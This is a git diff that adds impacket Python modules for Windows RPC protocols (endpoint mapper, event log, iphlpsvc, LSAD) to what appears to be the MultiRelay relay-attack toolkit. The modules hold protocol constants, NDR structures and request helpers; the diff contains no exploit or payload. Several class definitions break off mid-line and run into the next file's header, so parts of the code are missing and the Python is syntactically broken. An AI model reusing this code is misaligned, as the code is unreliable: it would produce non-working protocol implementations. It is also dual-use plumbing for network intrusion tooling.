+'4AFC3636-DB01-4052-80C3-03BBCB8D3C69':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'D99BDAAE-B13A-4178-9FDB-E27F16B4603E':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'D68168C9-82A2-4F85-B6E9-74707C49A58F':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'13B50BFF-290A-47DD-8558-B7C58DB1A71A':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'6E6F6B40-977C-4069-BDDD-AC710059F8C0':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'9AA58360-CE33-4F92-B658-ED24B14425B8':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'E0393303-90D4-4A97-AB71-E9B671EE2729':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'07E5C822-F00C-47A1-8FCE-B244DA56FD06':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'8326CD1D-CF59-4936-B786-5EFC08798E25':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'1BE2275A-B315-4F70-9E44-879B3A2A53F2':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'0316560B-5DB4-4ED9-BBB5-213436DDC0D9':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'14FBE036-3ED7-4E10-90E9-A5FF991AFF01':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'3B69D7F5-9D94-4648-91CA-79939BA263BF':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'D5D23B6D-5A55-4492-9889-397A3C2D2DBC':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'88306BB2-E71F-478C-86A2-79DA200A0F11':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'118610B7-8D94-4030-B5B8-500889788E4E':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'0AC13689-3134-47C6-A17C-4669216801BE':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'0818A8EF-9BA9-40D8-A6F9-E22833CC771E':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'6788FAF9-214E-4B85-BA59-266953616E09':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'B481498C-8354-45F9-84A0-0BDD2832A91F':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'10C5E575-7984-4E81-A56B-431F5F92AE42':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'38A0A9AB-7CC8-4693-AC07-1F28BD03C3DA':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'8FB6D884-2388-11D0-8C35-00C04FDA2795':'[MS-W32T]: W32Time Remote Protocol',
+'5422FD3A-D4B8-4CEF-A12E-E87D4CA22E90':'[MS-WCCE]: Windows Client Certificate Enrollment Protocol',
+'D99E6E70-FC88-11D0-B498-00A0C90312F3':'[MS-WCCE]: Windows Client Certificate Enrollment Protocol',
+'1A927394-352E-4553-AE3F-7CF4AAFCA620':'[MS-WDSC]: Windows Deployment Services Control Protocol',
+'6BFFD098-A112-3610-9833-46C3F87E345A':'[MS-WKST]: Workstation Service Remote Protocol',
+'F1E9C5B2-F59B-11D2-B362-00105A1F8177':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'423EC01E-2E35-11D2-B604-00104B703EFD':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'9556DC99-828C-11CF-A37E-00AA003240C7':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'F309AD18-D86A-11D0-A075-00C04FB68820':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'9A653086-174F-11D2-B5F9-00104B703EFD':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'D4781CD6-E5D3-44DF-AD94-930EFE48A887':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'44ACA674-E8FC-11D0-A07C-00C04FB68820':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'541679AB-2E5F-11D3-B34E-00104BCC4B4A':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'027947E1-D731-11CE-A357-000000000001':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'A359DEC5-E813-4834-8A2A-BA7F1D777D76':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'C49E32C6-BC8B-11D2-85D4-00105A1F8304':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'C49E32C7-BC8B-11D2-85D4-00105A1F8304':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'2C9273E0-1DC3-11D3-B364-00105A1F8177':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'7C857801-7381-11CF-884D-00AA004B2E24':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'DC12A681-737F-11CF-884D-00AA004B2E24':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'8BC3F05E-D86B-11D0-A075-00C04FB68820':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'44ACA675-E8FC-11D0-A07C-00C04FB68820':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'1C1C45EE-4395-11D2-B60B-00104B703EFD':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'674B6698-EE92-11D0-AD71-00C04FD8FDFF':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',
+'FC910418-55CA-45EF-B264-83D4CE7D30E0':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',
+'C5CEBEE2-9DF5-4CDD-A08C-C2471BC144B4':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',
+'F31931A9-832D-481C-9503-887A0E6A79F0':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',
+'21546AE8-4DA5-445E-987F-627FEA39C5E8':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',
+'BC681469-9DD9-4BF4-9B3D-709F69EFE431':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',
+'4F7CA01C-A9E5-45B6-B142-2332A1339C1D':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',
+'2A3EB639-D134-422D-90D8-AAA1B5216202':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',
+'59602EB6-57B0-4FD8-AA4B-EBF06971FE15':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',
+'481E06CF-AB04-4498-8FFE-124A0A34296D':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',
+'E8BCFFAC-B864-4574-B2E8-F1FB21DFDC18':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',
+'943991A5-B3FE-41FA-9696-7F7B656EE34B':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',
+'BBA9CB76-EB0C-462C-AA1B-5D8C34415701':'[MS-ADTS]: Active Directory Technical Specification',
+'906B0CE0-C70B-1067-B317-00DD010662DA':'[MS-CMPO]: MSDTC Connection Manager:',
+'E3514235-4B06-11D1-AB04-00C04FC2DCD2':'[MS-DRSR]: Directory Replication Service (DRS) Remote Protocol',
+'F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C':'[MS-EVEN6]: EventLog Remoting Protocol',
+'D049B186-814F-11D1-9A3C-00C04FC9B232':'[MS-FRS1]: File Replication Service Protocol',
+'F5CC59B4-4264-101A-8C59-08002B2F8426':'[MS-FRS1]: File Replication Service Protocol',
+'5A7B91F8-FF00-11D0-A9B2-00C04FB6E6FC':'[MS-MSRP]: Messenger Service Remote Protocol',
+'F5CC5A18-4264-101A-8C59-08002B2F8426':'[MS-NSPI]: Name Service Provider Interface (NSPI) Protocol',
+'E33C0CC4-0482-101A-BC0C-02608C6BA218':'[MS-RPCL]: Remote Procedure Call Location Services Extensions',
+'AFA8BD80-7D8A-11C9-BEF4-08002B102989':'[MS-RPCE]: Remote Management Interface',
+'00000134-0000-0000-C000-000000000046':'[MS-DCOM]: Distributed Component Object Model (DCOM)',
+'18F70770-8E64-11CF-9AF1-0020AF6E72F4':'[MS-DCOM]: Distributed Component Object Model (DCOM)',
+'958F92D8-DA20-467A-BBE3-65E7E9B4EDCF':'[MS-TSGU]: Terminal Services Gateway Server Management Interface',
+'6050B110-CE87-4126-A114-50AEFCFC95F8':'[MS-DCOM]: Distributed Component Object Model (DCOM)',
+'1544F5E0-613C-11D1-93DF-00C04FD7BD09':'[MS-OXABREF]: Address Book Name Service Provider Interface (NSPI) Referral Protocol',
+'A4F1DB00-CA47-1067-B31F-00DD010662DA':'[MS-OXCRPC]: Wire Format Protocol',
+'5261574A-4572-206E-B268-6B199213B4E4':'[MS-OXCRPC]: Wire Format Protocol',
+}
+
+# Inquire Type
+RPC_C_EP_ALL_ELTS = 0x0
+RPC_C_EP_MATCH_BY_IF = 0x1
+RPC_C_EP_MATH_BY_OBJ = 0x2
+RPC_C_EP_MATH_BY_BOTH = 0x1
+
+# Vers Option
+RPC_C_VERS_ALL = 0x1
+RPC_C_VERS_COMPATIBLE = 0x2
+RPC_C_VERS_EXACT = 0x3
+RPC_C_VERS_MARJOR_ONLY= 0x4
+RPC_C_VERS_UPTO = 0x5
+
+# Search
+RPC_NO_MORE_ELEMENTS = 0x16c9a0d6
+
+# Floors constants
+FLOOR_UUID_IDENTIFIER = 0x0d
+# Protocol Identifiers
+FLOOR_RPCV5_IDENTIFIER = 0x0b # DCERPC Connection Oriented v.5
+FLOOR_MSNP_IDENTIFIER = 0x0c # MS Named Pipes (LRPC)
+# Pipe Identifier
+FLOOR_NBNP_IDENTIFIER = 0x0f # NetBIOS Named Pipe
+# HostName Identifier
+FLOOR_MSNB_IDENTIFIER = 0x11 # MS NetBIOS HostName
+# PortAddr Identifier
+FLOOR_TCPPORT_IDENTIFIER = 0x07
+# HTTP Protocol
+FLOOR_HTTP_IDENTIFIER = 0x1f
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+# Tower Floors: As states in C706:
+# This appendix defines the rules for encoding an protocol_tower_t (abstract)
+# into the twr_t.tower_octet_string and twr_p_t->tower_octet_string fields
+# (concrete). For historical reasons, this cannot be done using the standard NDR
+# encoding rules for marshalling and unmarshalling. A special encoding is
+# required.
+# Note that the twr_t and twr_p_t are mashalled as standard IDL data types,
+# encoded in the standard transfer syntax (for example, NDR). As far as IDL and
+# NDR are concerned, tower_octet_string is simply an opaque conformant byte
+# array. This section only defines how to construct this opaque open array of
+# octets, which contains the actual protocol tower information.
+# The tower_octet_string[ ] is a variable length array of octets that encodes
+# a single, complete protocol tower. It is encoded as follows:
+# * Addresses increase, reading from left to right.
+# * Each tower_octet_string begins with a 2-byte floor count, encoded
+# little-endian, followed by the tower floors as follows:
+# +-------------+---------+---------+---------+---------+---------+
+# | floorcount | floor1 | floor2 | floor3 | ... | floorn |
+# +-------------+---------+---------+---------+---------+---------+
+# The number of tower floors is specific to the particular protocol tower,
+# also known as a protseq.
+# * Eachtowerfloorcontainsthefollowing:
+# |<- tower floor left hand side ->|<- tower floor right hand side ->|
+# +------------+-----------------------+------------+----------------------+
+# | LHS byte | protocol identifier | RHS byte | related or address |
+# | count | data | count | data |
+# +------------+-----------------------+------------+----------------------+
+# The LHS (Left Hand Side) of the floor contains protocol identifier information.
+# Protocol identifier values and construction rules are defined in Appendix I.
+# The RHS (Right Hand Side) of the floor contains related or addressing
+# information. The type and encoding for the currently defined protocol
+# identifiers are given in Appendix I.
+# The floor count, LHS byte count and RHS byte count are all 2-bytes,
+# in little endian format.
+#
+# So.. we're gonna use Structure to solve this
+
+# Standard Floor Assignments
+class EPMFloor(Structure):
+ structure = (
+ ('LHSByteCount','H=0'),
+ )
+
+EPMFloors = [
+EPMRPCInterface,
+EPMRPCDataRepresentation,
+EPMFloor,
+EPMFloor,
+EPMFloor,
+EPMFloor
+]
+
+class EPMTower(Structure):
+ structure = (
+ ('NumberOfFloors','.
+# There are test cases for them too.
+#
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDR, NDRPOINTERNULL, NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import ULONG, LPWSTR, RPC_UNICODE_STRING, LPSTR, NTSTATUS, NULL, PRPC_UNICODE_STRING, PULONG, USHORT, PRPC_SID, LPBYTE
+from impacket.dcerpc.v5.lsad import PRPC_UNICODE_STRING_ARRAY
+from impacket.structure import Structure
+from impacket import nt_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_EVEN = uuidtup_to_bin(('82273FDC-E32A-18C3-3F78-827929DC23EA','0.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in nt_errors.ERROR_MESSAGES:
+ error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1]
+ return 'EVEN SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'EVEN SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.2 EventType
+EVENTLOG_SUCCESS = 0x0000
+EVENTLOG_ERROR_TYPE = 0x0001
+EVENTLOG_WARNING_TYPE = 0x0002
+EVENTLOG_INFORMATION_TYPE = 0x0004
+EVENTLOG_AUDIT_SUCCESS = 0x0008
+EVENTLOG_AUDIT_FAILURE = 0x0010
+
+# 2.2.7 EVENTLOG_HANDLE_A and EVENTLOG_HANDLE_W
+#EVENTLOG_HANDLE_A
+EVENTLOG_HANDLE_W = LPWSTR
+
+# 2.2.9 Constants Used in Method Definitions
+MAX_STRINGS = 0x00000100
+MAX_SINGLE_EVENT = 0x0003FFFF
+MAX_BATCH_BUFF = 0x0007FFFF
+
+# 3.1.4.7 ElfrReadELW (Opnum 10)
+EVENTLOG_SEQUENTIAL_READ = 0x00000001
+EVENTLOG_SEEK_READ = 0x00000002
+
+EVENTLOG_FORWARDS_READ = 0x00000004
+EVENTLOG_BACKWARDS_READ = 0x00000008
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+class IELF_HANDLE(NDRSTRUCT):
+ structure = (
+ ('Data','20s=""'),
+ )
+ def getAlignment(self):
+ return 1
+
+# 2.2.3 EVENTLOGRECORD
+class EVENTLOGRECORD(Structure):
+ structure = (
+ ('Length','.
+# There are test cases for them too.
+#
+from impacket import system_errors
+from impacket.dcerpc.v5.dtypes import WSTR, DWORD, LPWSTR, ULONG, LARGE_INTEGER, WORD, BYTE
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRUniConformantArray, NDRUniVaryingArray, NDRSTRUCT
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_EVEN6 = uuidtup_to_bin(('F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__(self):
+ key = self.error_code
+ if key in system_errors.ERROR_MESSAGES:
+ error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
+ return 'EVEN6 SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'EVEN6 SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+# Evt Path Flags
+EvtQueryChannelName = 0x00000001
+EvtQueryFilePath = 0x00000002
+EvtReadOldestToNewest = 0x00000100
+EvtReadNewestToOldest = 0x00000200
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+class CONTEXT_HANDLE_LOG_HANDLE(NDRSTRUCT):
+ align = 1
+ structure = (
+ ('Data', '20s=""'),
+ )
+
+class PCONTEXT_HANDLE_LOG_HANDLE(NDRPOINTER):
+ referent = (
+ ('Data', CONTEXT_HANDLE_LOG_HANDLE),
+ )
+
+class CONTEXT_HANDLE_LOG_QUERY(NDRSTRUCT):
+ align = 1
+ structure = (
+ ('Data', '20s=""'),
+ )
+
+class PCONTEXT_HANDLE_LOG_QUERY(NDRPOINTER):
+ referent = (
+ ('Data', CONTEXT_HANDLE_LOG_QUERY),
+ )
+
+class LPPCONTEXT_HANDLE_LOG_QUERY(NDRPOINTER):
+ referent = (
+ ('Data', PCONTEXT_HANDLE_LOG_QUERY),
+ )
+
+class CONTEXT_HANDLE_OPERATION_CONTROL(NDRSTRUCT):
+ align = 1
+ structure = (
+ ('Data', '20s=""'),
+ )
+
+class PCONTEXT_HANDLE_OPERATION_CONTROL(NDRPOINTER):
+ referent = (
+ ('Data', CONTEXT_HANDLE_OPERATION_CONTROL),
+ )
+
+# 2.2.11 EvtRpcQueryChannelInfo
+class EvtRpcQueryChannelInfo(NDRSTRUCT):
+ structure = (
+ ('Name', LPWSTR),
+ ('Status', DWORD),
+ )
+
+class EvtRpcQueryChannelInfoArray(NDRUniVaryingArray):
+ item = EvtRpcQueryChannelInfo
+
+class LPEvtRpcQueryChannelInfoArray(NDRPOINTER):
+ referent = (
+ ('Data', EvtRpcQueryChannelInfoArray)
+ )
+
+class RPC_INFO(NDRSTRUCT):
+ structure = (
+ ('Error', DWORD),
+ ('SubError', DWORD),
+ ('SubErrorParam', DWORD),
+ )
+
+class PRPC_INFO(NDRPOINTER):
+ referent = (
+ ('Data', RPC_INFO)
+ )
+
+class WSTR_ARRAY(NDRUniVaryingArray):
+ item = WSTR
+
+class DWORD_ARRAY(NDRUniVaryingArray):
+ item = DWORD
+
+class LPDWORD_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', DWORD_ARRAY)
+ )
+
+class BYTE_ARRAY(NDRUniVaryingArray):
+ item = 'c'
+
+class CBYTE_ARRAY(NDRUniVaryingArray):
+ item = BYTE
+
+class CDWORD_ARRAY(NDRUniConformantArray):
+ item = DWORD
+
+class LPBYTE_ARRAY(NDRPOINTER):
+ referent = (
+ ('Data', CBYTE_ARRAY)
+ )
+
+class ULONG_ARRAY(NDRUniVaryingArray):
+ item = ULONG
+
+# 2.3.1 EVENT_DESCRIPTOR
+class EVENT_DESCRIPTOR(NDRSTRUCT):
+ structure = (
+ ('Id', WORD),
+ ('Version', BYTE),
+ ('Channel', BYTE),
+ ('LevelSeverity', BYTE),
+ ('Opcode', BYTE),
+ ('Task', WORD),
+ ('Keyword', ULONG),
+ )
+
+class BOOKMARK(NDRSTRUCT):
+ structure = (
+ ('BookmarkSize', DWORD),
+ ('HeaderSize', ' / Positive Technologies (https://www.ptsecurity.com/)
+#
+# Description:
+# Implementation of iphlpsvc.dll MSRPC calls (Service that offers IPv6 connectivity over an IPv4 network)
+
+from socket import inet_aton
+
+from impacket import uuid
+from impacket import hresult_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.dtypes import BYTE, ULONG, WSTR, GUID, NULL
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRUniConformantArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_IPHLP_IP_TRANSITION = uuidtup_to_bin(('552d076a-cb29-4e44-8b6a-d15e59e2c0af', '1.0'))
+
+# RPC_IF_ALLOW_LOCAL_ONLY
+MSRPC_UUID_IPHLP_TEREDO = uuidtup_to_bin(('ecbdb051-f208-46b9-8c8b-648d9d3f3944', '1.0'))
+MSRPC_UUID_IPHLP_TEREDO_CONSUMER = uuidtup_to_bin(('1fff8faa-ec23-4e3f-a8ce-4b2f8707e636', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in hresult_errors.ERROR_MESSAGES:
+ error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+ return 'IPHLP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'IPHLP SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+# Notification types
+NOTIFICATION_ISATAP_CONFIGURATION_CHANGE = 0
+NOTIFICATION_PROCESS6TO4_CONFIGURATION_CHANGE = 1
+NOTIFICATION_TEREDO_CONFIGURATION_CHANGE = 2
+NOTIFICATION_IP_TLS_CONFIGURATION_CHANGE = 3
+NOTIFICATION_PORT_CONFIGURATION_CHANGE = 4
+NOTIFICATION_DNS64_CONFIGURATION_CHANGE = 5
+NOTIFICATION_DA_SITE_MGR_LOCAL_CONFIGURATION_CHANGE_EX = 6
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+class BYTE_ARRAY(NDRUniConformantArray):
+ item = 'c'
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+# Opnum 0
+class IpTransitionProtocolApplyConfigChanges(NDRCALL):
+ opnum = 0
+ structure = (
+ ('NotificationNum', BYTE),
+ )
+
+class IpTransitionProtocolApplyConfigChangesResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', ULONG),
+ )
+
+# Opnum 1
+class IpTransitionProtocolApplyConfigChangesEx(NDRCALL):
+ opnum = 1
+ structure = (
+ ('NotificationNum', BYTE),
+ ('DataLength', ULONG),
+ ('Data', BYTE_ARRAY),
+ )
+
+class IpTransitionProtocolApplyConfigChangesExResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', ULONG),
+ )
+
+# Opnum 2
+class IpTransitionCreatev6Inv4Tunnel(NDRCALL):
+ opnum = 2
+ structure = (
+ ('LocalAddress', "4s=''"),
+ ('RemoteAddress', "4s=''"),
+ ('InterfaceName', WSTR),
+ )
+
+class IpTransitionCreatev6Inv4TunnelResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', ULONG),
+ )
+
+# Opnum 3
+class IpTransitionDeletev6Inv4Tunnel(NDRCALL):
+ opnum = 3
+ structure = (
+ ('TunnelGuid', GUID),
+ )
+
+class IpTransitionDeletev6Inv4TunnelResponse(NDRCALL):
+ structure = (
+ ('ErrorCode', ULONG),
+ )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+
+OPNUMS = {
+ 0 : (IpTransitionProtocolApplyConfigChanges, IpTransitionProtocolApplyConfigChangesResponse),
+ 1 : (IpTransitionProtocolApplyConfigChangesEx, IpTransitionProtocolApplyConfigChangesExResponse),
+ 2 : (IpTransitionCreatev6Inv4Tunnel, IpTransitionCreatev6Inv4TunnelResponse),
+ 3 : (IpTransitionDeletev6Inv4Tunnel, IpTransitionDeletev6Inv4TunnelResponse)
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+ if string == NULL:
+ return string
+
+ if string[-1:] != '\x00':
+ return string + '\x00'
+ else:
+ return string
+
+# For all notifications except EX
+def hIpTransitionProtocolApplyConfigChanges(dce, notification_num):
+ request = IpTransitionProtocolApplyConfigChanges()
+ request['NotificationNum'] = notification_num
+
+ return dce.request(request)
+
+# Only for NOTIFICATION_DA_SITE_MGR_LOCAL_CONFIGURATION_CHANGE_EX
+# No admin required
+def hIpTransitionProtocolApplyConfigChangesEx(dce, notification_num, notification_data):
+ request = IpTransitionProtocolApplyConfigChangesEx()
+ request['NotificationNum'] = notification_num
+ request['DataLength'] = len(notification_data)
+ request['Data'] = notification_data
+
+ return dce.request(request)
+
+# Same as netsh interface ipv6 add v6v4tunnel "Test Tunnel" 192.168.0.1 10.0.0.5
+def hIpTransitionCreatev6Inv4Tunnel(dce, local_address, remote_address, interface_name):
+ request = IpTransitionCreatev6Inv4Tunnel()
+ request['LocalAddress'] = inet_aton(local_address)
+ request['RemoteAddress'] = inet_aton(remote_address)
+
+ request['InterfaceName'] = checkNullString(interface_name)
+ request.fields['InterfaceName'].fields['MaximumCount'] = 256
+
+ return dce.request(request)
+
+def hIpTransitionDeletev6Inv4Tunnel(dce, tunnel_guid):
+ request = IpTransitionDeletev6Inv4Tunnel()
+ request['TunnelGuid'] = uuid.string_to_bin(tunnel_guid)
+
+ return dce.request(request)
diff --git a/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/lsad.py b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/lsad.py
new file mode 100644
index 0000000..6aeec63
--- /dev/null
+++ b/tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/lsad.py
@@ -0,0 +1,1665 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+# [MS-LSAD] Interface implementation
+#
+# Best way to learn how to use these calls is to grab the protocol standard
+# so you understand what the call does, and then read the test case located
+# at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+# Some calls have helper functions, which makes it even easier to use.
+# They are located at the end of this file.
+# Helper functions start with "h".
+# There are test cases for them too.
+#
+from __future__ import division
+from __future__ import print_function
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRENUM, NDRUNION, NDRUniConformantVaryingArray, NDRPOINTER, NDR, NDRSTRUCT, \
+ NDRUniConformantArray
+from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, STR, LUID, LONG, ULONG, RPC_UNICODE_STRING, PRPC_SID, LPBYTE, \
+ LARGE_INTEGER, NTSTATUS, RPC_SID, ACCESS_MASK, UCHAR, PRPC_UNICODE_STRING, PLARGE_INTEGER, USHORT, \
+ SECURITY_INFORMATION, NULL, MAXIMUM_ALLOWED, GUID, SECURITY_DESCRIPTOR, OWNER_SECURITY_INFORMATION
+from impacket import nt_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.enum import Enum
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_LSAD = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AB','0.0'))
+
+class DCERPCSessionError(DCERPCException):
+ def __init__(self, error_string=None, error_code=None, packet=None):
+ DCERPCException.__init__(self, error_string, error_code, packet)
+
+ def __str__( self ):
+ key = self.error_code
+ if key in nt_errors.ERROR_MESSAGES:
+ error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+ error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1]
+ return 'LSAD SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+ else:
+ return 'LSAD SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.1.1.2 ACCESS_MASK for Policy Objects
+POLICY_VIEW_LOCAL_INFORMATION = 0x00000001
+POLICY_VIEW_AUDIT_INFORMATION = 0x00000002
+POLICY_GET_PRIVATE_INFORMATION = 0x00000004
+POLICY_TRUST_ADMIN = 0x00000008
+POLICY_CREATE_ACCOUNT = 0x00000010
+POLICY_CREATE_SECRET = 0x00000020
+POLICY_CREATE_PRIVILEGE = 0x00000040
+POLICY_SET_DEFAULT_QUOTA_LIMITS = 0x00000080
+POLICY_SET_AUDIT_REQUIREMENTS = 0x00000100
+POLICY_AUDIT_LOG_ADMIN = 0x00000200
+POLICY_SERVER_ADMIN = 0x00000400
+POLICY_LOOKUP_NAMES = 0x00000800
+POLICY_NOTIFICATION = 0x00001000
+
+# 2.2.1.1.3 ACCESS_MASK for Account Objects
+ACCOUNT_VIEW = 0x00000001
+ACCOUNT_ADJUST_PRIVILEGES = 0x00000002
+ACCOUNT_ADJUST_QUOTAS = 0x00000004
+ACCOUNT_ADJUST_SYSTEM_ACCESS = 0x00000008
+
+# 2.2.1.1.4 ACCESS_MASK for Secret Objects
+SECRET_SET_VALUE = 0x00000001
+SECRET_QUERY_VALUE = 0x00000002
+
+# 2.2.1.1.5 ACCESS_MASK for Trusted Domain Objects
+TRUSTED_QUERY_DOMAIN_NAME = 0x00000001
+TRUSTED_QUERY_CONTROLLERS = 0x00000002
+TRUSTED_SET_CONTROLLERS = 0x00000004
+TRUSTED_QUERY_POSIX = 0x00000008
+TRUSTED_SET_POSIX = 0x00000010
+TRUSTED_SET_AUTH = 0x00000020
+TRUSTED_QUERY_AUTH = 0x00000040
+
+# 2.2.1.2 POLICY_SYSTEM_ACCESS_MODE
+POLICY_MODE_INTERACTIVE = 0x00000001
+POLICY_MODE_NETWORK = 0x00000002
+POLICY_MODE_BATCH = 0x00000004
+POLICY_MODE_SERVICE = 0x00000010
+POLICY_MODE_DENY_INTERACTIVE = 0x00000040
+POLICY_MODE_DENY_NETWORK = 0x00000080
+POLICY_MODE_DENY_BATCH = 0x00000100
+POLICY_MODE_DENY_SERVICE = 0x00000200
+POLICY_MODE_REMOTE_INTERACTIVE = 0x00000400
+POLICY_MODE_DENY_REMOTE_INTERACTIVE = 0x00000800
+POLICY_MODE_ALL = 0x00000FF7
+POLICY_MODE_ALL_NT4 = 0x00000037
+
+# 2.2.4.4 LSAPR_POLICY_AUDIT_EVENTS_INFO
+# EventAuditingOptions
+POLICY_AUDIT_EVENT_UNCHANGED = 0x00000000
+POLICY_AUDIT_EVENT_NONE = 0x00000004
+POLICY_AUDIT_EVENT_SUCCESS = 0x00000001
+POLICY_AUDIT_EVENT_FAILURE = 0x00000002
+
+# 2.2.4.19 POLICY_DOMAIN_KERBEROS_TICKET_INFO
+# AuthenticationOptions
+POLICY_KERBEROS_VALIDATE_CLIENT = 0x00000080
+
+# 2.2.7.21 LSA_FOREST_TRUST_RECORD
+# Flags
+LSA_TLN_DISABLED_NEW = 0x00000001
